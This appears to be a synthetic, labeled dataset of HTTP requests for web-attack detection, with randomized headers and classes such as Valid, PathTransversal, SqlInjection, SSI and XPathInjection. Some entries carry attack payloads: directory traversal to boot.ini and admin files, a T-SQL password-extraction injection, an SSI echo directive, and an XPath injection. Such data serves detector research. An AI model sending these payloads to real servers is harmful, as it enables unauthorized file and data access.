Accept-Encoding: gzip;q=0.4, identity, identity;q=0.2, deflate;q=0.2, identity
Accept-Language: *
Cache-Control: min-fresh=68247
Client-ip: 4.62.251.210
Cookie: 5bsectEct2r=060
Cookie2: $Version="896"
Date: Sat, 29 Apr 06 12:51:22 GMT
ETag: W/"NDTNAThFdSCA-p."
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Mon, 13 Dec 04 18:14:55 CET
If-Unmodified-Since: Sat, 18 Mar 06 24:01:58 UTC
If-Match: "i2_F0a4e2c5IzbPhvDg"
If-None-Match: *
If-Range: "zYW1-9b-.SPTKEB"
Max-Forwards: 533
MIME-Version: 9.7
Pragma: onearteh=ml1zn
Authorization: NTLM ZWdkOG1ubmxpZXNiZWVOcmRPaWNldFRua29zb25lc2Y=
Range: -3789,-5,300-00360
Referer: http://www.teznpl.be/taethrvN/ukEp7eju.tiff
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 6.4; wb-ae; rv:9.9.4) Gecko/72172711
UA-OS: Solaris
Via: eees/4.4 55.68.84.13:57, FTP/4.3 www.NanrFnsa.htm, 2.4 236.212.232.139
Transfer-Encoding: gzip
----: -------------------

null

End - Id: 38663
Start - Id: 45550
class: PathTransversal
GET /u8@6m7xDZfZX8eCi5/eO_x/t9QAwoO3kEx9Zp7VvKxA/62x/aQG0.swf?elthpwe4Oe=%24n+e&iSe3alhoprhni=position%26netcatw7tn%3De%5Cly3&atoEhb=57069&PLOj0qErAv=w%3A%5Cwindows%5Cboot.ini&Yi--6tmpt@csSY=rgwinntdiv&htuogAegeToh5c=+ee HTTP/1.0
Host: 138.165.73.179
Connection: keep-alive
Accept: image/*;q=0.2, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=47
Client-ip: 15.78.136.11
Cookie: DjykWos1fancnl= 6;HsmestIo=aD4;Zg0Wl3qY=0929;eisApuseeee=E
Cookie2: $Version="19"
Date: Thu, 17 Aug 06 06:56:05 UTC
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: urperzok
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 08 Jul 06 17:46:48 UTC
If-Unmodified-Since: Fri, 30 Mar 07 09:14:08 GMT
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: *
Max-Forwards: 256
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 903-3,3-4324,-8
Referer: /a8tlIqn/crbwkoh/nrktas.mpg
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: efitht/1.0
UA-CPU: PowerPC
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/9.2 86.2.124.28:29375
Transfer-Encoding: compress
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45550
Start - Id: 14402
class: Valid
GET /np10lUtt.w9WwV-/5rlf3nsne7Tds/pbikdio/k3g6g5l3zu/it5kb5tmriad/eoitet/ey0I2B6/rpueae/fakN4XaR/yybtshnonahi.html?6wovoeo=dk7Ttdjyrtorism0c&_kCNQh3window.open.kH=daiS-og2&26jPx2=n_ad1ebNw&dPtei=2&emOeXao5uexd=bcG%40&ZOformCDo3=tlwgetw+%29ecmdE%28o5+dnode&n8elua=%3B&seahw1g=fDTGvbgZc HTTP/1.0
Host: www.8nFio.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: 9lIenge='oqs4Ot'
Client-ip: 242.114.172.151
Cookie: jkU_Tee-YEhaving8=cox
Cookie2: $Version="325"
Date: Tue, 26 Sep 06 02:51:45 CET
ETag: W/"cqjrqZ@6YYakjiimuP"
Expect: osi9
From: Rt7eei@haruek9a0.st
If-Modified-Since: Fri, 09 Apr 10 20:36:31 CET
If-Unmodified-Since: Sat, 09 Sep 06 08:31:07 GMT
If-Match: *
If-None-Match: "jW6hbNQt0xSG7Il."
If-Range: *
Max-Forwards: 6
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: Digest realm
Range: 30-
Referer: /ca7zsdr/twwee/Rsmd8jee.bin
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 7.2; os-2a; rv:8.9.1) Gecko/28067617
UA-CPU: StrongARM
UA-Disp: 8055,616,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: HTTP/9.8 252.109.39.47
Transfer-Encoding: compress
Upgrade: iidn/5.9, wiont/0.5
Warning: 239 www.iiaa.jpg "v1nj0rT7djelun" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14402
Start - Id: 44940
class: PathTransversal
GET /B6WLr/4NZ-VPosZlG4x/qifsss/Rm3rnStenDm4bhtr.jpeg?eacPw3io=t&OhShQttd=ruTZZmT&s099r=..%2F..%2F..%2Fel%2Fadmin.txt&Ssetsds6=nlt9 HTTP/1.1
Host: 85.204.27.60
Connection: close
Accept: video/quicktime;q=0.9, audio/x-wav, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 92.170.136.192
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="776"
Date: Tue, 26 Jul 05 07:41:17 GMT
ETag: W/"FTabip4q-bvxfAK_"
Expect: 100-continue
From: idto@ug5qpuenx6.org
If-Modified-Since: Sat, 19 Jan 08 16:02:52 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:10:48 UTC
If-Match: "V@NlObOh6h9Xa1D"
If-None-Match: *
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 6
MIME-Version: 8.4
Pragma: nmaynthe=enrHlq
Proxy-Authorization: NTLM aGExY2ZuZ2h5ZXN0YWVoamkwNjR4c0FxdG96eGh0cmVpcGVjdGVzbmV5ZW1hbg==
Authorization: iaweD nleptOe=4ijclSgY
Range: 032407-30
Referer: http://TDes.biz/d3dh8oe/ugaaIun/ttoI.aspx
TE: trailers
Trailer: Cache-Control
User-Agent: enIrfD http://www.O9exvc.st
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2762x370
Via: 9.2 199.10.123.110, 9.5 www.utnrimsp.htm:45194, HTTP/6.1 www.mTncihro.js
Transfer-Encoding: gzip
Upgrade: stntow/3.4, 4egw/7.2
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44940
Start - Id: 3913
class: Valid
POST /RvW.css? HTTP/1.1
Content-Length: 181
Content-Language: oamre5m,hnEy
Content-Encoding: deflate
Content-Location: http://eTe4.ch/2eNf/nsHitqa.pl
Content-MD5: ZTN1c2l0bGhhZmRuazNzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jun 06 14:34:46 CET
Last-Modified: Fri, 04 May 07 13:32:15 CET
Host: www.met80p3s.de
Connection: keep-alive
Accept: audio/x-wav;q=0.2, image/*;q=0.6, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 136.255.71.42
Cookie: ditneAhatattin=I0te;gosne6crrrscnuu=d20
Cookie2: $Version="47"
Date: Wed, 16 Jun 04 11:44:17 UTC
ETag: "jwm9SMvzrCks6h5Jg"
Expect: heh9
From: eorts@aetwspnaa.biz
If-Modified-Since: Sun, 27 Sep 09 14:13:03 CET
If-Unmodified-Since: Mon, 03 Dec 07 09:17:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8886
MIME-Version: 1.4
Pragma: iA6n9eHc=Jttn
Proxy-Authorization: z832s 6oeibs=oiszIn
Authorization: eitDal obREhdhs=7rhaeuE
Range: 935-,27-,5312-
Referer: /tass/nhsu1t/odEdPir/t8xtp/ahrytjlr.swf
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: ioUK00qKaH http://www.mabbp.gov
UA-CPU: PowerPC
UA-Disp: 341,615,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 698x5679
Via: 1.3 70.111.10.116:8, 2.6 www.heiueeg.png
Transfer-Encoding: compress
Upgrade: benr/6.9, ceas/6.6, oe8a/3.8, 3meta/5.3
Warning: 884 93.144.26.206:701 "e5urtc8hhy7ie8rxs" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

8thfehesscyrro=g&ife3setowyuahI=nx4BGlo_&e2hinurroeu=osu3S&inq=R h&7u26rTS2x8processing-instructionx=rke4-asaes&dbOwzum=Ososj\oie?aDls nm &relo0i7=uPEqcSkig.&us=ezetnetgyueIlToo

End - Id: 3913
Start - Id: 5389
class: Valid
POST /eelqafdieansbgTwxf/uaynnbordElo/iXfxNXVNDY8vNEdmLFkQ/vNO.XGk-X7J8s/88ZlNHqlYwkDDR-mY/xealsnddhospgrutWovH/bKnW.OXmP7H-Yef7BS.sh? HTTP/1.0
Content-Length: 132
Content-Language: to7Ip,soo
Content-Encoding: compress
Content-Location: /hlreea.css
Content-MD5: aHVhc2VIc3NydzRmdG9yaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Mon, 12 Jan 04 02:03:20 UTC
Host: 121.215.78.156
Connection: ilomt
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 49.138.242.29
Cookie: jt=IOe(
Cookie2: $Version="9"
Date: Mon, 09 Nov 09 04:29:51 GMT
ETag: "CwpH02W93_.9WkBHrQ7"
Expect: 100-continue
From: grrehtnt@eeeeuNf.net
If-Modified-Since: Sat, 26 Jul 08 09:43:37 UTC
If-Unmodified-Since: Fri, 27 May 05 23:34:02 CET
If-Match: *
If-None-Match: "BRj8BC3FWUbxzAqz6"
If-Range: Mon, 20 Dec 04 12:43:31 UTC
Max-Forwards: 86
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bWNlZUdjOm5nY2k0dGhh
Authorization: NTLM ZG5uZ01SdmF1cm91bzYybmpPb3RlbHlubGRjMmdlc2NoZHJhaWVpdGM=
Range: 429-04732,0-0702,6-47430
Referer: http://www.csammp.be/beya/lnad3jtE/jeniaa/Y6x9/rtp8.js
TE: trailers,deflate;q=0.9
Trailer: Expect
User-Agent: Mozilla/4.6 (Windows; U; WinNT 1.0; wt-ir; rv:7.2.2) Gecko/82738645
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 237x186
Via: HTTP/2.5 www.rncypi8.shtml, FTP/2.1 www.dtCsn.html, 4.4 243.206.160.219:94411
Transfer-Encoding: identity
Upgrade: kngae/6.3, mste/8.3, wrohS/0.0, nienm/5.3, e33t/4.1
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ui84scinfia9=n&cnetwtioi=ball&ayek=n&1xmi= 9jemailenodsr96hs&chr5ao4swieeaz=sye osh9dchildeaen&pa6nessnie8anpd=aoiRa3godn snodendvar

End - Id: 5389
Start - Id: 33919
class: Valid
PUT /dthKPE35TrAQcdutde/t6c3seL/irkir/Mgerg7yrrmd5L-EM/a_0P4/sehnhioX/sfiMekt/huh34x/oscriptB2668r9JMSKO/ef0fcnrcpRdRehvO/y5.png? HTTP/1.0
Content-Length: 301
Content-Language: cze2
Content-Encoding: identity
Content-Location: /rteo/dEft/HgDk.exe
Content-MD5: ZHJFVG93cmI4aWV0RXVlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Aug 05 04:24:49 GMT
Last-Modified: Sat, 04 Oct 08 13:36:51 GMT
Host: www.1t5rhu3le.biz
Connection: close
Accept: */*
Accept-Charset: big5, x-mac-chinesesimp;q=0.5, iso-8859-8-i, iso-8859-1;q=0.2
Accept-Encoding: compress, compress;q=0.1, identity;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 248.12.106.141
Cookie: qyfs=Spasswdeejwsa%hchildar;Twindow.openBnk=2751
Cookie2: $Version="71"
Date: Wed, 28 May 08 05:26:08 CET
ETag: "k8j2P@MWQ5XdVEu0GhY"
Expect: feoerhv
From: faUspl3@yqiAa4o.it
If-Modified-Since: Mon, 23 Jun 08 14:56:14 UTC
If-Unmodified-Since: Thu, 09 Sep 04 20:24:49 GMT
If-Match: "Ao@mL.urI.OIcudWgl"
If-None-Match: "Uqf5BzC_d8KCgYWOJHyM"
If-Range: *
Max-Forwards: 906
MIME-Version: 8.7
Pragma: fo1peh9='aTl3S1tn'
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic M2ZyNGhwNmw6ZXNjcHJsb3A=
Range: -996,858-589875
Referer: /2aGAB3/a6en/eRpsu.html
TE: chunked;q=0.6
Trailer: Connection
User-Agent: sm9tles/4.1.5
UA-CPU: Sparc
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: od4Ety/8.5 www.Naotmao.css, FTP/8.0 www.pzehe.jpg, nha4oy/4.2 www.q4siadt.css:91
Transfer-Encoding: gzip
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 412 www.r5gne.shtml "u69WAnYcnqurieva" 
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BGKErdropnrutelnetNprocessing-instruction=ziolAWs6tlnlpu&fvau1elnyt=kmlhcaths9eeako&DgIp59inputhEwQ=639618533&i3fwzastifn=ao6&nylfTodofha=66772144&doqthna7=lSY2VSZ_wl2&uHAJN64=5239980&e0aarenney=iEKmE&A0ot7ms9a6lru=8469469868&reefenbed4ft=jnled6zwha&eiakky=9246&nms2h9ror1hhncg=dhictle%isaeai( ndc

End - Id: 33919
Start - Id: 3870
class: Valid
PUT /yM/rl59cis/sol4dMB@9rccoeDOD/d5qIHtMLl6J/Esieehhwfnsmrimt/3eBLA.Q/vOybixE9u/dG10choS/wh4i5gyyoo6z/19/rfkW75gK.php? HTTP/1.1
Content-Length: 68
Content-Language: st1er,tynisr,a
Content-Encoding: identity
Content-Location: http://aLQnid.com/umkois/grnq.swf
Content-MD5: b2ZzbWllOTFzbnRpcGFubw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 08:02:25 GMT
Last-Modified: Sun, 18 Apr 04 18:05:06 UTC
Host: 179.182.237.36:80
Connection: edttpmt
Accept: */*
Accept-Charset: windows-874, windows-1253;q=0.6, x-mac-arabic;q=0.0, euc-jp;q=0.0
Accept-Encoding: 
Accept-Language: T0O-e1auy;q=0.6, eeqd2e-eaesaqs;q=0.2, eaihva1n-toe
Cache-Control: no-transform
Client-ip: 154.215.255.197
Cookie: n6eappNnt3motti=d:c~sdtpoa]zvbscripto
Cookie2: $Version="47"
Date: Sat, 23 Oct 04 07:56:45 UTC
ETag: W/"4CuJc2UOB2IJoeLBxRF"
Expect: 100-continue
If-Modified-Since: Mon, 29 May 06 03:15:27 CET
If-Unmodified-Since: Mon, 16 Jan 06 20:26:04 GMT
If-Match: "kqY4muIE5ZqwoM."
If-None-Match: *
If-Range: Sun, 28 Sep 08 06:19:39 GMT
Max-Forwards: 760
MIME-Version: 1.4
Pragma: lnane='aoes'
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: Digest response="34Be1EdD523CF64F66D05da1aeC5BF2a"
Range: 459294-700,2-,-859
Referer: /ahleiort.gif
TE: deflate;q=0.3,deflate,chunked;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; Unix 8.2; tv-ni; rv:7.4.6) Gecko/64148719
UA-CPU: x86
UA-Disp: 170,019,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2540x1804
Via: 9.1 www.hRiAas9.js, ti1/1.2 222.188.119.201
Transfer-Encoding: deflate
Upgrade: 1dd/5.6
Warning: 358 50.141.159.101 "eefthcbta34PysTeoes" 
X-Forwarded-For: 25.247.174.254
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

hulhbehsembRszl=6200&UXiVo=%xDar&neaspzhlntmze=7753&mNc4iaa=azPf4E

End - Id: 3870
Start - Id: 34556
class: Valid
POST /tlnateoEGoGa/eDE1dP80tOdHBBzt.js? HTTP/1.0
Content-Length: 276
Content-Language: six,tefsS,jgaSe
Content-Encoding: identity
Content-Location: /htmk/hoosni/lkarbsan/daelnff/seQuan.php3
Content-MD5: ZW9maTNyZW96YXJueWg0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Dec 09 10:15:51 UTC
Last-Modified: Sun, 06 May 07 18:53:04 UTC
Host: 194.102.154.31
Connection: neemmna
Accept: */*
Accept-Charset: x-mac-korean, big5, cp-932, euc-jp;q=0.6, x-mac-roman
Accept-Encoding: identity, compress;q=0.0, deflate, deflate, identity;q=0.5
Accept-Language: *
Cache-Control: idooo=li4o
Client-ip: 71.183.190.111
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="819"
Date: Thu, 06 Apr 06 09:04:53 GMT
ETag: "gY1vMtzXVC4AuJDCwZH"
Expect: yiqyob
From: r4o9@ecoOy.ch
If-Modified-Since: Mon, 07 Sep 09 17:40:37 CET
If-Unmodified-Since: Mon, 09 Feb 04 04:03:24 CET
If-Match: "KlvFZ.fawPyg2N8G"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: rnneuc rratB=vneii
Range: 700959-,22-,44069-
Referer: http://autjiee.be/3tgmnat/l0MnT3ar/ndce/ohmosmy/toncr.html
TE: chunked;q=0.9
Trailer: Host
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 9.1; es-lt; rv:8.3.5) Gecko/07731169
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 059x5664
Via: HTTP/7.4 www.nnIe5p.shtml, HTTP/9.6 www.trtrng5i.html
Transfer-Encoding: compress
Upgrade: tilnna/3.3
Warning: 572 93.181.174.70:9 "Nv99hl5yheexr" "Tue, 08 Jan 08 21:03:46 UTC"
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 899542790
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

mrnnhepaoyjsry=34441&XGz@insertI3Ypw=ehn<&uohetmbes=orD0lUoenutlymIeOd&rwetc8rh1Son=a=iahd&7sabogyec=$o&IK1ajunionFEP=137598&Yhizyes4WtP=' imgreplaceOoieyuuecen-rcp&rheokpmbtz=tmni0&nfEqeexhtA=eY:&theie2seata=4326200&2aora=oro&document4whereG8insertHeOKBU=dfsefm4can

End - Id: 34556
Start - Id: 42691
class: SqlInjection
PUT /K5selectqzjwgetcFhfY/wAb.html? HTTP/1.1
Content-Length: 116
Content-Language: M
Content-Encoding: deflate
Content-Location: /eesTeqej.htm
Content-MD5: OE9vOGFub1RvY21hZmhodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 03:58:38 UTC
Last-Modified: Tue, 06 Nov 07 03:40:48 GMT
Host: www.tuotl.st
Connection: 5doeIOt
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: %27%3B+++++begin+++++declare++++%40ret+++varchar%288000%29++++set+++%40ret%3D%27%3A%27++select+%40ret%3D%40ret%2B%27++%27%2Beyd8m%2B%27%2F%27%2Bpassword+++from+++dwp+++where++tqTi%3E%40ret++select++++%40ret++++as+++++ret++++into++foo+++++end--
Cache-Control: max-stale
Client-ip: 5.139.219.37
Cookie: afxzy=je+tt%3E%3AGat%27%24%7Cf+so;Twindow.openHLftZnY%u.=ijbZS6q;haosaoTh7sT=mafogtoslq;varnaoioas=86790621;7hihmhdA1=31233;cra=4agyy7meeAzfEm4n
Cookie2: $Version="319"
Date: Wed, 12 Dec 07 24:08:27 GMT
ETag: "I8TX.xHK2VGc-Fb0iH0"
Expect: 2rerajnn=llDcy0Nh
From: ntoittcr@aetm8itm.uk
If-Modified-Since: Mon, 29 May 06 16:01:08 CET
If-Unmodified-Since: Tue, 27 Dec 05 21:10:05 UTC
If-None-Match: *
If-Range: "z2itNxIxmdYsJsIL"
Max-Forwards: 929
MIME-Version: 2.4
Pragma: ea8swsrh=7ih0
Proxy-Authorization: NTLM NGFyNHRxbjRlc3RlNGFvcjRlOW9ybGxodHdlZ2lkOGhnaGk=
Authorization: NTLM bmJTbk9pZWF5Z3Rlc2FlbnJla2lvbDFybDVhdHRmaTBZZW44aWZuaG9JZTdl
Range: 192-,-15804
Referer: http://www.tfti7ead.uk/Tnsh/scd8oygS/fnlR/toEsoo/imNntRi.bin
TE: deflate;q=0.5,deflate;q=0.0,gzip;q=0.4
User-Agent: arLbap8c1C http://www.nltql.gov
UA-Disp: 662,3518,32
UA-Color: color8
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: identity
Upgrade: di2/3.5, 6tBsi/4.2
Warning: 766 www.raittgp6.gif "naie" 
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

R3=eQ.MPeKaavtg&ehv2v=h7Teer8yietbsiCtoi&yeTeni5nxsWeais=joptb&nldgaharl=p6sr3wehmaelqte&epMtm=97&w5jean=nVT&N0n=1wE

End - Id: 42691
Start - Id: 39257
class: SSI
GET /ew1nmchteao1esC/glonxEmChhomeaccess_log/9rcseltinktyl3rso/sytc/tsjv0-.cgi?ein6uzfji=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&1inotrmTn7r=oA%24f&edamkearX8n=aoveenndrophftse&lAKShss=62&pdj=-selectdo&mrDrmcm9mr53ugE=xerljNthi7&woer8at=213 HTTP/1.1
Host: www.hlshzern.cz:99
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: fiut-qyceTrp;q=0.8, aoAqh-e;q=0.4, ttetn-faieats, ioscpuir-r
Cache-Control: max-age=673
Client-ip: 185.110.139.50
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="96"
Date: Sat, 14 Jul 07 18:21:47 UTC
ETag: "I6x001IZy.Iz5lBYh"
Expect: 1tru4e0e=nmgodha;Hlme=rptcyece
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 07 Jul 06 21:22:10 UTC
If-Unmodified-Since: Tue, 17 Jan 06 08:13:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 533
MIME-Version: 2.5
Pragma: uvphOt='ig8st'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM ZXQwYWFlY284ZXRuaGFJYW5vZW8wb3NoYTA5bm5heXVkbnJld2c=
Range: 5-9725,-6683
Referer: /Yte37plD.jpg
TE: chunked,trailers
Trailer: If-Range
User-Agent: aiwsi/1.6.9.3
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 272x2054
Via: 9.3 www.wmo2ho.png, 8.1 www.naierm.shtml, HTTP/7.0 www.luree.html
Transfer-Encoding: identity
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 175 www.eSis7tea.tiff:885 "oeto0awd6ika" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39257
Start - Id: 48885
class: XPathInjection
GET /owea6e7wheersw8tynp/Ra6evls1tsBunyllnv/i0rdV-UoChM9U3E9V9cw/fmY2./l7jHiA@rdY-QHNDn@/zCQUT8z4PsH/rjlIBsU3oy8-iup034Pu/9l57l/eeeohvmOiY.shtml?hloT8n=g%3Bqeq&Gvstasnr=%3Ao1a%5Cuuo%3ELduph+Envts&e0eyf=q2r6%27++++or+%28i+%3C++++count%286pb%2Fchild%3A%3Atext%28%29%29++++and++j++++%3C+++++count%28lLx%2Fchild%3A%3Acomment%28%29%29+and++++k++++%3C+++++count%28uniteS%2Fchild%3A%3A*%29+%29++or+++%27otocltn%27+++%3D+%27+ogitxA6I%27++++or&qieseeunl4=00&sl8sdtuisE=666400 HTTP/1.0
Host: 211.185.207.138
Connection: mrn9
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: nIty='9'
Client-ip: 154.110.51.106
Cookie: bit8zpiedc=98959;ecGg2tycrE=434460318
Cookie2: $Version="784"
Date: Wed, 08 Sep 04 21:59:44 UTC
ETag: "62GK_7jLYsp@BqfFlhae"
Expect: 100-continue
From: nhrer@c9ndnn.gov
If-Modified-Since: Mon, 18 Aug 08 16:01:49 GMT
If-Unmodified-Since: Thu, 12 Jun 08 13:29:51 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 896
MIME-Version: 4.6
Pragma: 3istR=ee8
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest nonce
Range: 41-,-69
Referer: http://www.8edoab.uk/5txwaF.nsf
TE: gzip,trailers,deflate
Trailer: Expect
User-Agent: sRYle@P7D http://www.Tsaidmot.de
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/0.8 208.148.238.138:05, FTP/3.9 www.sifze.css
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48885
Start - Id: 32965
class: Valid
PUT /oT/sn8SMjO3kIzKD1X/kfjaa8c.jpg? HTTP/1.1
Content-Length: 259
Content-Language: epnM,5
Content-Encoding: gzip
Content-Location: http://AcDs.fr/ozbl.php3
Content-MD5: c3luc3RuOGhuYmFubnRBdw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 May 10 10:01:34 CET
Last-Modified: Thu, 18 Oct 07 07:02:19 UTC
Host: www.whrvr9y8at.uk:753
Connection: keep-alive
Accept: text/*;q=0.5, image/jpeg
Accept-Charset: iso-8859-9, iso-8859-2;q=0.0, iso-8859-5;q=0.0, windows-1252;q=0.3, windows-1253
Accept-Encoding: *;q=0.6
Accept-Language: tont-Htu;q=0.8, o-itrnw3;q=0.3, pnlAn0t4-net;q=0.6, er-atojChn
Cache-Control: no-store
Client-ip: 236.101.226.248
Cookie: MNn4eef1en=g1N8X;slkhambaunel=0s;trsLce=68855708;hsilotlNr4pn6hn=36$;replacergZ=gbHy
Cookie2: $Version="212"
Date: Sat, 04 Jul 09 23:24:23 GMT
ETag: "b-J1ig-Ur0JjrIUNLzz"
Expect: rgnNuOh
From: eoiw@ba5rdx.uk
If-Modified-Since: Mon, 19 Mar 07 04:34:25 UTC
If-Unmodified-Since: Thu, 15 May 08 10:49:45 GMT
If-Match: "iHYRbWG-ESB6HqGe"
If-None-Match: *
If-Range: *
Max-Forwards: 2625
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aXNTNzlyOnR0eHVl
Authorization: NTLM dHdFMDdzcmRucnRuaTF3anFzZGVlN2NkaWhsVXNsTmw0Tm1idEw=
Range: -67900,74-11848
Referer: /al4imn/ftrct1ho/oroNoo/26ws.swf
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 3.0; ex-mt; rv:6.0.7) Gecko/02018546
UA-CPU: StrongARM
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 532x605
